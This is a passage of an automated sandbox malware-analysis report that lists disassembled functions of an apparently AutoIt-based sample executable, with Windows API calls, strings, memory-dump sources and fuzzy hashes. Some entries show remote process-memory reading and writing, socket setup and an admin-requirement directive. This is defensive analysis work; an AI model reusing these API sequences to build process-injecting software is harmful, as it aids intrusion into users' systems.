                                          • Part of subcall function 00C100A3: __onexit.LIBCMT ref: 00C100A9
                                        • __Init_thread_footer.LIBCMT ref: 00C77BFB
                                          • Part of subcall function 00C101F8: EnterCriticalSection.KERNEL32(00CC070C,?,?,00C08747,00CC2514), ref: 00C10202
                                          • Part of subcall function 00C101F8: LeaveCriticalSection.KERNEL32(00CC070C,?,00C08747,00CC2514), ref: 00C10235
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                        • String ID: 5$G$Variable must be of type 'Object'.
                                        • API String ID: 535116098-3733170431
                                        • Opcode ID: cdb218d1239470eeada7845b176c960bce4f2e30d1e47e110b9a74cae61dd1d6
                                        • Instruction ID: 3bce871a6f4442441f77e25a55addc8bc9aceb6a3d93739063a1f577a9f320eb
                                        • Opcode Fuzzy Hash: cdb218d1239470eeada7845b176c960bce4f2e30d1e47e110b9a74cae61dd1d6
                                        • Instruction Fuzzy Hash: 94918970A04209EFCB14EF94D881DBDB7B1FF48300F108199F81A9B292DB71AE85DB51
                                        Function 00C52716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C5B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C521D0,?,?,00000034,00000800,?,00000034), ref: 00C5B42D
                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C52760
                                          • Part of subcall function 00C5B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C521FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00C5B3F8
                                          • Part of subcall function 00C5B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00C5B355
                                          • Part of subcall function 00C5B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C52194,00000034,?,?,00001004,00000000,00000000), ref: 00C5B365
                                          • Part of subcall function 00C5B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C52194,00000034,?,?,00001004,00000000,00000000), ref: 00C5B37B
                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C527CD
                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C5281A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                        • String ID: @
                                        • API String ID: 4150878124-2766056989
                                        • Opcode ID: e019e511e27b54cb6128016378be0ead8adf4e167d0b7deadf3103846c4f6366
                                        • Instruction ID: 79434df7af77be73111cad6b453593f4563927b174b78cb4d98e2b6f850d4fe5
                                        • Opcode Fuzzy Hash: e019e511e27b54cb6128016378be0ead8adf4e167d0b7deadf3103846c4f6366
                                        • Instruction Fuzzy Hash: 2D412B76900218AFDB10DBA4CD81BEEBBB8AF09300F004095FA55B7191DB706E89DBA4
                                        Function 00C2172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DSD876543456780000.exe,00000104), ref: 00C21769
                                        • _free.LIBCMT ref: 00C21834
                                        • _free.LIBCMT ref: 00C2183E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _free$FileModuleName
                                        • String ID: C:\Users\user\Desktop\DSD876543456780000.exe
                                        • API String ID: 2506810119-2387194488
                                        • Opcode ID: 69984e4ea18f635aac4f74b86d5d8d4be7cb57b4ffbf3e487bc3bdd98b8968da
                                        • Instruction ID: bfe9bb91cfcb462ccdf358b69a986d0c343f08a7e117b8a0060c6140ae47664f
                                        • Opcode Fuzzy Hash: 69984e4ea18f635aac4f74b86d5d8d4be7cb57b4ffbf3e487bc3bdd98b8968da
                                        • Instruction Fuzzy Hash: C131B275A00228FFCB21DF9AE881E9EBBFCEB95710B194166FC04D7611D6708E40DBA0
                                        Function 00C5C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C5C306
                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00C5C34C
                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00CC1990,00F16468), ref: 00C5C395
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Menu$Delete$InfoItem
                                        • String ID: 0
                                        • API String ID: 135850232-4108050209
                                        • Opcode ID: 6c28651e5471e41cdf2d11b57de04b300b7555f30b97fb46816e46c0e0d41d82
                                        • Instruction ID: 5c1f4e3069b2fdbe1d5080380dbc338d23f870226d9a56cf07ac9d8d96b49424
                                        • Opcode Fuzzy Hash: 6c28651e5471e41cdf2d11b57de04b300b7555f30b97fb46816e46c0e0d41d82
                                        • Instruction Fuzzy Hash: 1541C3352043059FD720DF25D8C4B9ABBE4AF85311F00861DFDA5972E1D730E948DB6A
                                        Function 00C84416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00C8CC08,00000000,?,?,?,?), ref: 00C844AA
                                        • GetWindowLongW.USER32 ref: 00C844C7
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C844D7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$Long
                                        • String ID: SysTreeView32
                                        • API String ID: 847901565-1698111956
                                        • Opcode ID: 2cd0eac07b928230aa4cea6198564203de15e8ca0f00b4d1dd2c8b6edeb71ae7
                                        • Instruction ID: a6eb73fdef4d1bf5c3a1be0c41976ac0d5a45956488b1c14c73ccb5a70ce7813
                                        • Opcode Fuzzy Hash: 2cd0eac07b928230aa4cea6198564203de15e8ca0f00b4d1dd2c8b6edeb71ae7
                                        • Instruction Fuzzy Hash: F131AD31210206AFDF24AE78DC85BEA7BA9EB48338F204725F975931E1D770ED509764
                                        Function 00C7304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C7335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00C73077,?,?), ref: 00C73378
                                        • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C7307A
                                        • _wcslen.LIBCMT ref: 00C7309B
                                        • htons.WSOCK32(00000000,?,?,00000000), ref: 00C73106
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                        • String ID: 255.255.255.255
                                        • API String ID: 946324512-2422070025
                                        • Opcode ID: 7864a931734f75fb81a1c90a1b99724b256ff8e55cffdc7ae5225dd8d065e224
                                        • Instruction ID: f96c832b931ea0ab4248fbd5b624aefe77b1331fbf5fb5670365defba73c77e0
                                        • Opcode Fuzzy Hash: 7864a931734f75fb81a1c90a1b99724b256ff8e55cffdc7ae5225dd8d065e224
                                        • Instruction Fuzzy Hash: A031C4392002859FCB10CF69C585FA977E0EF54314F64C099E9298B392D731DF45D760
                                        Function 00C84653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C84705
                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C84713
                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C8471A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$DestroyWindow
                                        • String ID: msctls_updown32
                                        • API String ID: 4014797782-2298589950
                                        • Opcode ID: 142f54e9ac6e976f5d02ef76d2abe5976b5e721aa4ebad14fc813157efdedc3b
                                        • Instruction ID: a2c72ece9a80fa345b2e27f1f55d86dd9edb904dcbc4876d8f93f57205c9f5df
                                        • Opcode Fuzzy Hash: 142f54e9ac6e976f5d02ef76d2abe5976b5e721aa4ebad14fc813157efdedc3b
                                        • Instruction Fuzzy Hash: 35217FB5600209AFDB14EF68DCC1EBB37ADEF4A3A8B140059FA109B251DB30ED11DB64
                                        Function 00C595AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                        • API String ID: 176396367-2734436370
                                        • Opcode ID: a66c66b53beb6e226dc77757628bec269d5a1e8ef54cb0e8b1dd77852ff54b39
                                        • Instruction ID: ff3d3855ffc8a2dafc802af7ccff2267665c9c5c76bd579c6c7e746a35c4ed46
                                        • Opcode Fuzzy Hash: a66c66b53beb6e226dc77757628bec269d5a1e8ef54cb0e8b1dd77852ff54b39
                                        • Instruction Fuzzy Hash: 21213436204210A6C731AA259802EB773D8DFA1311F8040AAFD5997082EF709EDED299
                                        Function 00C837B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C83840
                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C83850
                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C83876
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$MoveWindow
                                        • String ID: Listbox
                                        • API String ID: 3315199576-2633736733
                                        • Opcode ID: 69406c336dccf7dfbb66d8006a819748288372b9287ca75d004c78c04d0464b3
                                        • Instruction ID: 2d963eb4f07895717e0942a4acdfe0e35bbe5da63a4d3245516240cc216a44c3
                                        • Opcode Fuzzy Hash: 69406c336dccf7dfbb66d8006a819748288372b9287ca75d004c78c04d0464b3
                                        • Instruction Fuzzy Hash: 4B21F272610118BBEF119F54CC84FBB376EEF89B58F119124F9109B190CA71DD1287A4
                                        Function 00C649F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 00C64A08
                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C64A5C
                                        • SetErrorMode.KERNEL32(00000000,?,?,00C8CC08), ref: 00C64AD0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ErrorMode$InformationVolume
                                        • String ID: %lu
                                        • API String ID: 2507767853-685833217
                                        • Opcode ID: dcc2ce6152182219e6e9b4de0a848963f7cbfa40c93f3274217a19269ee988d9
                                        • Instruction ID: 7695ee4d04933cd16621590305a62a3772f52338b769aa8ee6fecd983a949453
                                        • Opcode Fuzzy Hash: dcc2ce6152182219e6e9b4de0a848963f7cbfa40c93f3274217a19269ee988d9
                                        • Instruction Fuzzy Hash: B7311E75A00109AFDB14DF54C9C5EAE7BF8EF08308F1480A9E909DB252D771EE45DB61
                                        Function 00C841EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C8424F
                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C84264
                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C84271
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: msctls_trackbar32
                                        • API String ID: 3850602802-1010561917
                                        • Opcode ID: 2401218c46c1a2bd945c2c2862849c8a3f160cd6b070b464b5f2221c2179946d
                                        • Instruction ID: 042c3c22a9c790e0d10ac5efa45a3631a30dfc2a1910a13af87cd4c5cffbc8d4
                                        • Opcode Fuzzy Hash: 2401218c46c1a2bd945c2c2862849c8a3f160cd6b070b464b5f2221c2179946d
                                        • Instruction Fuzzy Hash: 53110631244249BEEF20AF39CC46FAB3BACEF95B58F110124FA65E2090D671DC21DB24
                                        Function 00C52F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF6B57: _wcslen.LIBCMT ref: 00BF6B6A
                                          • Part of subcall function 00C52DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C52DC5
                                          • Part of subcall function 00C52DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C52DD6
                                          • Part of subcall function 00C52DA7: GetCurrentThreadId.KERNEL32 ref: 00C52DDD
                                          • Part of subcall function 00C52DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C52DE4
                                        • GetFocus.USER32 ref: 00C52F78
                                          • Part of subcall function 00C52DEE: GetParent.USER32(00000000), ref: 00C52DF9
                                        • GetClassNameW.USER32(?,?,00000100), ref: 00C52FC3
                                        • EnumChildWindows.USER32(?,00C5303B), ref: 00C52FEB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                        • String ID: %s%d
                                        • API String ID: 1272988791-1110647743
                                        • Opcode ID: 14ce2ea06ce0231a53aab9d9e90dd72411ad4d6fb1f7c93a170d20ef6027bae5
                                        • Instruction ID: b6f8e81666042778e39de64e07513060d1ab3a5a9427ed7be9f28941f5bced0f
                                        • Opcode Fuzzy Hash: 14ce2ea06ce0231a53aab9d9e90dd72411ad4d6fb1f7c93a170d20ef6027bae5
                                        • Instruction Fuzzy Hash: 4C119D796002096BCF547F648CC6FEE37AAEF95305F044075BE099B292DE309A89DB74
                                        Function 00C85882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00C858C1
                                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00C858EE
                                        • DrawMenuBar.USER32(?), ref: 00C858FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Menu$InfoItem$Draw
                                        • String ID: 0
                                        • API String ID: 3227129158-4108050209
                                        • Opcode ID: 585882127cf0259a4fac1707a355a664f93a6b779afa29ee8c2004451876f79c
                                        • Instruction ID: cc96754be70929b95f304ef1ca34780e77f1b95cac602e6577d1a489f074ff22
                                        • Opcode Fuzzy Hash: 585882127cf0259a4fac1707a355a664f93a6b779afa29ee8c2004451876f79c
                                        • Instruction Fuzzy Hash: 0801AD31500208EFDB20AF11DC44BAEBBB4FB45364F0080A9E848D61A1DB708A81EF34
                                        Function 00C4D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00C4D3BF
                                        • FreeLibrary.KERNEL32 ref: 00C4D3E5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AddressFreeLibraryProc
                                        • String ID: GetSystemWow64DirectoryW$X64
                                        • API String ID: 3013587201-2590602151
                                        • Opcode ID: 18b098b88bdc073456484a9398cf4b493625fa55498e47177d7c9d157e8a57af
                                        • Instruction ID: 91f4e214e918e690ec2333b96f0f2afbb1022b774ffb480bfcac69cf3308a164
                                        • Opcode Fuzzy Hash: 18b098b88bdc073456484a9398cf4b493625fa55498e47177d7c9d157e8a57af
                                        • Instruction Fuzzy Hash: 53F05CB190561097D73236018CD8B5D36247F00B00F948198F803F2165D7A0CE8087D2
                                        Function 00C5007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 47326a3e013c854eff610c42fb7a2c560b0e330dba6f3b3e559f5f1de371d7b8
                                        • Instruction ID: e52f39db3304333848a45d95969d983316f77b79bc4e3808473956e45fb38eef
                                        • Opcode Fuzzy Hash: 47326a3e013c854eff610c42fb7a2c560b0e330dba6f3b3e559f5f1de371d7b8
                                        • Instruction Fuzzy Hash: DEC15E79A00206EFDB14CF94C898BAEB7B5FF48305F208598E915EB261D731DE85CB94
                                        Function 00C7342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInitInitializeUninitialize
                                        • String ID:
                                        • API String ID: 1998397398-0
